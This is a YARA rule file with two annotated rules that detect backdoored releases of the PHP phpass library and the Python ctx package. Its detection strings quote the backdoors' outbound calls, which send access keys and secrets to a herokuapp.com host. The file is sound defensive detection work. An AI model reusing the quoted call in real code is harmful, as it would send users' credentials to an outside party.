// Flags a small PHP file that contains the hard-coded outbound call described
// in `reference` as belonging to a backdoored phpass release.
// NOTE(review): the rule name ends in "May21" while `date` is 2022-05-24; the
// name is left untouched because scanners and allow-lists key on it.
// NOTE(review): no sample hashes are recorded in meta for this rule.
rule VULN_PHP_Hack_Backdoored_Phpass_May21 {
   meta:
      // meta values are informational only; YARA does not evaluate them
      description = "Detects backdoored PHP phpass version"
      author = "Christian Burkard"
      reference = "https://twitter.com/s0md3v/status/1529005758540808192"
      date = "2022-05-24"
      score = 75
      id = "da13924c-0448-589c-bb2a-ee09736a5602"
   strings:
      // The complete PHP call, including the interpolated $access and $secret
      // path segments. The URL is plain http://, so whatever those two
      // variables hold is sent unencrypted to the remote host.
      // This is an exact literal match on the known form; pair it with a
      // network-side check for the host name for broader coverage.
      $x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
   condition:
      // size gate first: restricts the match to files under 30KB
      filesize < 30KB
      and $x1
}
// Flags a small Python file that contains the hard-coded outbound request
// described in `reference` as belonging to a backdoored ctx release.
// NOTE(review): the rule name ends in "May21" while `date` is 2022-05-24; the
// name is left untouched because scanners and allow-lists key on it.
rule VULN_Python_Hack_Backdoored_Ctx_May21 {
   meta:
      // meta values are informational only; YARA does not evaluate them
      description = "Detects backdoored python ctx version"
      author = "Christian Burkard"
      reference = "https://twitter.com/s0md3v/status/1529005758540808192"
      date = "2022-05-24"
      score = 75
      // presumably SHA-256 digests of known samples (64 hex chars each);
      // they are not checked by the condition below
      hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
      hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
      hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
      id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
   strings:
      // Prefix of the requests.get() call up to the "/hacked/" path segment;
      // whatever follows in the URL is not part of the match.
      // `ascii` is YARA's default string mode and is spelled out here only
      // for readability.
      // This is an exact literal match on the known form; pair it with a
      // network-side check for the host name for broader coverage.
      $x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/" ascii
   condition:
      // size gate first: restricts the match to files under 10KB
      filesize < 10KB
      and $x1
}